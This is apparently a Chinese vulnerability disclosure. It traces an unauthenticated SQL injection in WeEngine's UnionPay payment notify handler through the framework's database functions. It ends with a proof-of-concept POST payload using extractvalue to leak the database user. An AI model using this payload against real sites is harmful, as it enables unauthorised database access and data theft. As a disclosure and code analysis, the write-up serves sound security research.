微擎科技最新版某处无需登录sql注入
- 发表于
- Vulndb
文件\payment\unionpay\notify.php
<?php /** * [WeEngine System] Copyright (c) 2014 WE7.CC * WeEngine is NOT a free software, it under the license terms, visited http://www.we7.cc/ for more details. */ error_reporting(0); define('IN_MOBILE', true); require '../../framework/bootstrap.inc.php'; $_W['uniacid'] = $_POST['reqReserved']; $setting = uni_setting($_W['uniacid'], array('payment')); if(!is_array($setting['payment'])) { exit('没有设定支付参数.'); } $payment = $setting['payment']['unionpay']; require '__init.php'; if (!empty($_POST) && verify($_POST) && $_POST['respMsg'] == 'success') { $sql = 'SELECT * FROM ' . tablename('core_paylog') . ' WHERE `uniontid`=:uniontid'; $params = array(); $params[':uniontid'] = $_POST['orderId']; $log = pdo_fetch($sql, $params); if(!empty($log) && $log['status'] == '0') { $log['tag'] = iunserializer($log['tag']); $log['tag']['queryId'] = $_POST['queryId']; $record = array(); $record['status'] = 1; $record['tag'] = iserializer($log['tag']); pdo_update('core_paylog', $record, array('plid' => $log['plid'])); if($log['is_usecard'] == 1 && $log['card_type'] == 1 && !empty($log['encrypt_code']) && $log['acid']) { load()->classs('coupon'); $acc = new coupon($log['acid']); $codearr['encrypt_code'] = $log['encrypt_code']; $codearr['module'] = $log['module']; $codearr['card_id'] = $log['card_id']; $acc->PayConsumeCode($codearr); } if($log['is_usecard'] == 1 && $log['card_type'] == 2) { $log['card_id'] = intval($log['card_id']); pdo_update('activity_coupon_record', array('status' => '2', 'usetime' => time(), 'usemodule' => $log['module']), array('uniacid' => $_W['uniacid'], 'recid' => $log['card_id'], 'status' => '1')); } $site = WeUtility::createModuleSite($log['module']); if(!is_error($site)) { $method = 'payResult'; if (method_exists($site, $method)) { $ret = array(); $ret['weid'] = $log['uniacid']; $ret['uniacid'] = $log['uniacid']; $ret['result'] = 'success'; $ret['type'] = $log['type']; $ret['from'] = 'nofity'; $ret['tid'] = $log['tid']; $ret['user'] = $log['openid']; $ret['fee'] = $log['fee']; $ret['tag'] = $log['tag']; $ret['is_usecard'] = $log['is_usecard']; $ret['card_type'] = $log['card_type']; $ret['card_fee'] = $log['card_fee']; $ret['card_id'] = $log['card_id']; $site->$method($ret); exit('success'); } } } } exit('fail');
着重对
require '../../framework/bootstrap.inc.php'; $_W['uniacid'] = $_POST['reqReserved']; $setting = uni_setting($_W['uniacid'], array('payment')); if(!is_array($setting['payment'])) { exit('没有设定支付参数.'); }
其实主要是对uni_setting进行查看。跟进uni_setting
if (!function_exists('uni_setting')) { function uni_setting($uniacid = 0, $fields = '*', $force_update = false) { global $_W; load()->model('account'); if ($fields == '*') { $fields = ''; } return uni_setting_load($fields, $uniacid); } }
继续跟进uni_setting_load
function uni_setting_load($name = '', $uniacid = 0) { global $_W; $uniacid = empty($uniacid) ? $_W['uniacid'] : $uniacid; $cachekey = "unisetting:{$uniacid}"; $unisetting = cache_load($cachekey); if (empty($unisetting)) { $unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid)); if (!empty($unisetting)) { $serialize = array('site_info', 'stat', 'oauth', 'passport', 'uc', 'notify', 'creditnames', 'default_message', 'creditbehaviors', 'shortcuts', 'payment', 'recharge', 'tplnotice', 'mcplugin'); foreach ($unisetting as $key => &$row) { if (in_array($key, $serialize) && !empty($row)) { $row = (array)iunserializer($row); } } } cache_write($cachekey, $unisetting); } if (empty($unisetting)) { return array(); } if (empty($name)) { return $unisetting; } if (!is_array($name)) { $name = array($name); } return array_elements($name, $unisetting); }
注意到
$unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid));
继续跟进pdo_get
function pdo_get($tablename, $condition = array(), $fields = array()) { return pdo()->get($tablename, $condition, $fields); }
持续跟进get
public function get($tablename, $params = array(), $fields = array()) { $select = '*'; if (!empty($fields)){ if (is_array($fields)) { $select = '`'.implode('`,`', $fields).'`'; } else { $select = $fields; } } $condition = $this->implode($params, 'AND'); $sql = "SELECT {$select} FROM " . $this->tablename($tablename) . (!empty($condition['fields']) ? " WHERE {$condition['fields']}" : '') . " LIMIT 1"; return $this->fetch($sql, $condition['params']); }
直接带入sql语句,没有过滤。直接上poc.
http://127.0.0.1/payment/unionpay/notify.php post: reqReserved[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1
原文连接:微擎科技最新版某处无需登录sql注入
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。